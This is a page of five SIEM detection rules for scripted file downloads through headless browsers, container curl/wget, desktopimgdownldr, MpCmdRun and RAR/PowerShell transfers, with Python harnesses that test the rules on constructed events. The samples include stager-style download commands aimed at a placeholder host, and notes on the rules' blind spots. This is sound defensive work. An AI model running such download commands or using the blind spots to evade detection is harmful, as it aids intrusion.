Deployable detection rules
5 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
Detections
Potential File Download via a Headless Browser
Identifies a headless browser launched from a suspicious parent process with arguments consistent with scripted retrieval: a --headless flag combined with a URL, a DOM dump (--dump-dom), or an inline base64 data: URL. Adversaries reach for browsers because they are trusted, signed binaries that proxy and application-control policies allow through, sidestepping restrictions placed on dedicated download tools.
Query
process where host.os.type == "windows" and event.type == "start" and
process.name : ("chrome.exe", "msedge.exe", "brave.exe", "browser.exe", "dragon.exe", "vivaldi.exe") and
process.args : "--headless*" and
process.args : ("--dump-dom", "*http*", "data:text/html;base64,*") and
process.parent.name :
("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "conhost.exe", "msiexec.exe",
"explorer.exe", "rundll32.exe", "winword.exe", "excel.exe", "onenote.exe", "hh.exe", "powerpnt.exe", "forfiles.exe",
"pcalua.exe", "wmiprvse.exe") and
not process.executable : (
"?:\\inetpub\\wwwroot\\*\\ext\\modules\\html2pdf\\bin\\chrome\\*\\chrome-win64\\chrome.exe",
"\\Device\\HarddiskVolume*\\inetpub\\wwwroot\\*\\ext\\modules\\html2pdf\\bin\\chrome\\*\\chrome-win64\\chrome.exe"
)
Curl or Wget Execution from Container Context
Detects execution of curl or wget from processes whose title is runc init, a common fingerprint for workloads
running inside OCI/runc-backed containers on Linux hosts instrumented with Auditd Manager.
After breaking out of an application container or abusing a privileged workload, attackers commonly use minimal
HTTP clients to pull in tooling (stagers, scripts, implants) or to stage exfiltration. The same utilities also
appear benignly in images, so context matters: anchoring on the runc init title narrows the signal to the container
runtime boundary, where an unexpected download client deserves more scrutiny than the same binary in an
administrator's shell on the host. The exclusions cover loopback targets and one fixed wget probe string; review
them against your own liveness and readiness checks before deploying.
Query
host.os.type:linux and
data_stream.dataset:"auditd_manager.auditd" and
event.action:("executed" or "exec") and
process.title:"runc init" and
(
process.name:(curl or wget) or
process.args:(*curl* or */bin/curl* or *wget*)
) and
not process.args :(*127.0.0.1* or *localhost* or "wget --no-verbose --tries=1 --spider --no-check-certificate http://${WEB_HOST}:${WEB_PORT}/api/ping || exit 1")
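The two process-execution rules above (the headless-browser rule and the container curl/wget rule) resolve on concrete records as follows. This is an added Python illustration, not the rules' own implementation or any SIEM's query engine; the events, executable paths and the 203.0.113.10 address are constructed for the example. EQL's ":" operator is approximated by a case-insensitive glob, while the KQL wildcards of the Linux rule are evaluated case-sensitively, as they are on a plain keyword field.

```python
"""Evaluate the two process-execution rules above over constructed ECS-style events.

Added illustration only: this is not the rules' own implementation nor any SIEM's
query engine. EQL's ':' is rendered as a case-insensitive glob; KQL wildcards on
keyword fields are case-sensitive, so the Linux rule is evaluated that way.
"""
import re


def glob_match(value: str, pattern: str, ignore_case: bool = True) -> bool:
    """Wildcard compare: '*' matches any run of characters, '?' exactly one."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value, re.IGNORECASE if ignore_case else 0) is not None


def any_match(values, patterns, ignore_case: bool = True) -> bool:
    """`field : (a, b)` over an array field: true if any element matches any pattern."""
    return any(glob_match(v, p, ignore_case) for v in values for p in patterns)


BROWSERS = ("chrome.exe", "msedge.exe", "brave.exe", "browser.exe", "dragon.exe", "vivaldi.exe")
PARENTS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "conhost.exe",
           "msiexec.exe", "explorer.exe", "rundll32.exe", "winword.exe", "excel.exe", "onenote.exe",
           "hh.exe", "powerpnt.exe", "forfiles.exe", "pcalua.exe", "wmiprvse.exe")
HTML2PDF_EXCLUSIONS = (  # '?' stands for the drive letter, as in the EQL
    r"?:\inetpub\wwwroot\*\ext\modules\html2pdf\bin\chrome\*\chrome-win64\chrome.exe",
    r"\Device\HarddiskVolume*\inetpub\wwwroot\*\ext\modules\html2pdf\bin\chrome\*\chrome-win64\chrome.exe",
)
HEALTHCHECK_EXCLUSIONS = (
    "*127.0.0.1*", "*localhost*",
    "wget --no-verbose --tries=1 --spider --no-check-certificate http://${WEB_HOST}:${WEB_PORT}/api/ping || exit 1",
)


def headless_browser_download(ev: dict) -> bool:
    """Python rendering of 'Potential File Download via a Headless Browser' (EQL, case-insensitive)."""
    p = ev["process"]
    return (ev["host"]["os"]["type"] == "windows" and ev["event"]["type"] == "start"
            and any_match([p["name"]], BROWSERS)
            and any_match(p["args"], ["--headless*"])
            and any_match(p["args"], ["--dump-dom", "*http*", "data:text/html;base64,*"])
            and any_match([p["parent"]["name"]], PARENTS)
            and not any_match([p["executable"]], HTML2PDF_EXCLUSIONS))


def container_curl_wget(ev: dict) -> bool:
    """Python rendering of 'Curl or Wget Execution from Container Context' (KQL, case-sensitive).
    The quoted KQL phrase on process.title is treated as an exact string compare."""
    p = ev["process"]
    return (ev["host"]["os"]["type"] == "linux"
            and ev["data_stream"]["dataset"] == "auditd_manager.auditd"
            and ev["event"]["action"] in ("executed", "exec")
            and p["title"] == "runc init"
            and (any_match([p["name"]], ["curl", "wget"], False)
                 or any_match(p["args"], ["*curl*", "*/bin/curl*", "*wget*"], False))
            and not any_match(p["args"], HEALTHCHECK_EXCLUSIONS, False))


def windows_event(parent: str, name: str, executable: str, args: list) -> dict:
    return {"host": {"os": {"type": "windows"}}, "event": {"type": "start"},
            "process": {"name": name, "executable": executable, "args": args, "parent": {"name": parent}}}


def linux_event(title: str, name: str, args: list) -> dict:
    return {"host": {"os": {"type": "linux"}}, "data_stream": {"dataset": "auditd_manager.auditd"},
            "event": {"action": "executed"}, "process": {"title": title, "name": name, "args": args}}


SAMPLES = {  # constructed events; paths and the 203.0.113.10 address are placeholders
    "scripted fetch": windows_event("cmd.exe", "msedge.exe", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                                    ["msedge.exe", "--headless=new", "--dump-dom", "http://203.0.113.10/payload.html"]),
    "html2pdf worker": windows_event("cmd.exe", "chrome.exe",
                                     r"C:\inetpub\wwwroot\app\ext\modules\html2pdf\bin\chrome\121\chrome-win64\chrome.exe",
                                     ["chrome.exe", "--headless", "--dump-dom", "http://localhost/report"]),
    "interactive browsing": windows_event("explorer.exe", "chrome.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                                          ["chrome.exe", "https://intranet.example/"]),
    "container download": linux_event("runc init", "curl", ["curl", "-sSL", "http://203.0.113.10/stage.sh", "-o", "/tmp/.s"]),
    "readiness probe": linux_event("runc init", "sh", ["sh", "-c", "wget --no-verbose --tries=1 --spider --no-check-certificate "
                                                       "http://${WEB_HOST}:${WEB_PORT}/api/ping || exit 1"]),
    "host admin shell": linux_event("bash", "curl", ["curl", "-sSL", "http://203.0.113.10/stage.sh"]),
}


def evaluate_all() -> dict:
    """Run each sample through the rule for its platform; returns {label: fired}."""
    return {label: (headless_browser_download(ev) if ev["host"]["os"]["type"] == "windows"
                    else container_curl_wget(ev)) for label, ev in SAMPLES.items()}


if __name__ == "__main__":
    for label, fired in evaluate_all().items():
        print(f"{'ALERT' if fired else 'quiet'}  {label}")
```

The html2pdf sample shows why the executable exclusion exists: the process tree and arguments are indistinguishable from the malicious case, and only the install path separates the PDF-rendering worker from a scripted fetch. The readiness-probe sample is excluded only because the whole shell command string matches the fixed wget exclusion exactly; a probe with a different flag order would fire.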
Remote File Download via Desktopimgdownldr Utility
Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to
download arbitrary files as an alternative to certutil.
Query
process where host.os.type == "windows" and event.type == "start" and (process.name : "desktopimgdownldr.exe" or ?process.pe.original_file_name == "desktopimgdownldr.exe") and process.args : "/lockscreenurl:http*"
Remote File Download via MpCmdRun
Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.
Query
process where host.os.type == "windows" and event.type == "start" and (process.name : "MpCmdRun.exe" or ?process.pe.original_file_name == "MpCmdRun.exe") and process.args : "-DownloadFile" and process.args : "-url" and process.args : "-path"
Roshal Archive (RAR) or PowerShell File Downloaded from the Internet
Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the internet by an internal host. Gaining
initial access to a system and then downloading encoded or encrypted tools to move laterally is a common practice for
adversaries as a way to protect their more valuable tools and tactics, techniques, and procedures (TTPs). This may be
atypical behavior for a managed network and can be indicative of malware, exfiltration, or command and control.
Query
(data_stream.dataset: (network_traffic.http or network_traffic.tls) or
(event.category: (network or network_traffic) and network.protocol: http)) and
(url.extension:(ps1 or rar) or url.path:(*.ps1 or *.rar)) and
not destination.ip:(
10.0.0.0/8 or
127.0.0.0/8 or
169.254.0.0/16 or
172.16.0.0/12 or
192.0.0.0/24 or
192.0.0.0/29 or
192.0.0.8/32 or
192.0.0.9/32 or
192.0.0.10/32 or
192.0.0.170/32 or
192.0.0.171/32 or
192.0.2.0/24 or
192.31.196.0/24 or
192.52.193.0/24 or
192.168.0.0/16 or
192.88.99.0/24 or
224.0.0.0/4 or
100.64.0.0/10 or
192.175.48.0/24 or
198.18.0.0/15 or
198.51.100.0/24 or
203.0.113.0/24 or
240.0.0.0/4 or
"::1" or
"FE80::/10" or
"FF00::/8"
) and
source.ip:(
10.0.0.0/8 or
172.16.0.0/12 or
192.168.0.0/16
)
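The network rule above, evaluated over constructed HTTP flow records. This is an added Python illustration, not the rule's own implementation; the flows, the 100.128.0.1 stand-in for an internet host and the 2001:db8:: addresses are constructed. The CIDR exclusions are checked with the standard ipaddress module, and the extension and path checks are exact-case, as KQL compares them on a plain keyword field.

```python
"""Evaluate the RAR/PowerShell download rule above over constructed HTTP flow records.

Added illustration only, not the rule's own implementation. The CIDR exclusions are
checked with the standard ipaddress module; KQL compares keyword values exactly, so
the extension and path checks here are case-sensitive as well.
"""
import ipaddress

EXCLUDED_DESTINATIONS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24",
    "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32",
    "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16",
    "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", "198.18.0.0/15",
    "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1/128", "fe80::/10", "ff00::/8")]
INTERNAL_SOURCES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def in_any(ip: str, networks) -> bool:
    """True if ip falls in any listed network; an address/network version mismatch is simply False."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def path_extension(path: str) -> str:
    """Approximates ECS url.extension: text after the last '.' of the final path segment."""
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[1] if "." in name else ""


def is_http_like(ev: dict) -> bool:
    """First clause of the rule: the http/tls network_traffic datasets, or a generic network event over http."""
    dataset = ev.get("data_stream", {}).get("dataset")
    return dataset in ("network_traffic.http", "network_traffic.tls") or (
        ev.get("event", {}).get("category") in ("network", "network_traffic")
        and ev.get("network", {}).get("protocol") == "http")


def rar_or_ps1_from_internet(ev: dict) -> bool:
    """Python rendering of the KQL rule: internal source, non-excluded destination, .ps1/.rar URL."""
    url = ev["url"]
    script_or_archive = url.get("extension") in ("ps1", "rar") or url["path"].endswith((".ps1", ".rar"))
    return (is_http_like(ev) and script_or_archive
            and not in_any(ev["destination"]["ip"], EXCLUDED_DESTINATIONS)
            and in_any(ev["source"]["ip"], INTERNAL_SOURCES))


def flow(src: str, dst: str, path: str, dataset: str = "network_traffic.http") -> dict:
    """Builds a constructed ECS-shaped HTTP flow record; url.extension is derived from the path here."""
    return {"data_stream": {"dataset": dataset}, "source": {"ip": src}, "destination": {"ip": dst},
            "url": {"path": path, "extension": path_extension(path)}}


# Constructed flows. 100.128.0.1 stands in for an internet host: it sits just past the
# 100.64.0.0/10 exclusion (which ends at 100.127.255.255), so it is not filtered out.
SAMPLES = {
    "script from internet": flow("10.20.30.40", "100.128.0.1", "/tools/loader.ps1"),
    "archive from file server": flow("192.168.1.15", "172.16.5.20", "/share/archive.rar"),
    "benign text download": flow("10.20.30.40", "100.128.0.1", "/downloads/readme.txt"),
    "mixed-case extension": flow("10.20.30.40", "100.128.0.1", "/tools/Loader.PS1"),
    "ipv6-only workstation": flow("fd12:3456::7", "2001:db8::10", "/tools/loader.ps1"),
    "inbound to dmz host": flow("100.128.0.1", "10.20.30.40", "/upload/tool.ps1"),
}


def evaluate_all() -> dict:
    """Returns {label: fired} for every constructed flow."""
    return {label: rar_or_ps1_from_internet(ev) for label, ev in SAMPLES.items()}


if __name__ == "__main__":
    for label, fired in evaluate_all().items():
        print(f"{'ALERT' if fired else 'quiet'}  {label}")
```

Two of the quiet samples are blind spots rather than intended exclusions. The source.ip clause lists only the RFC 1918 IPv4 ranges, so an IPv6-only internal host (ULA or global) never matches, whatever it downloads. And because keyword comparisons are exact-case, Loader.PS1 slips past both the extension list and the path wildcards unless the index applies a lowercase normalizer to those fields.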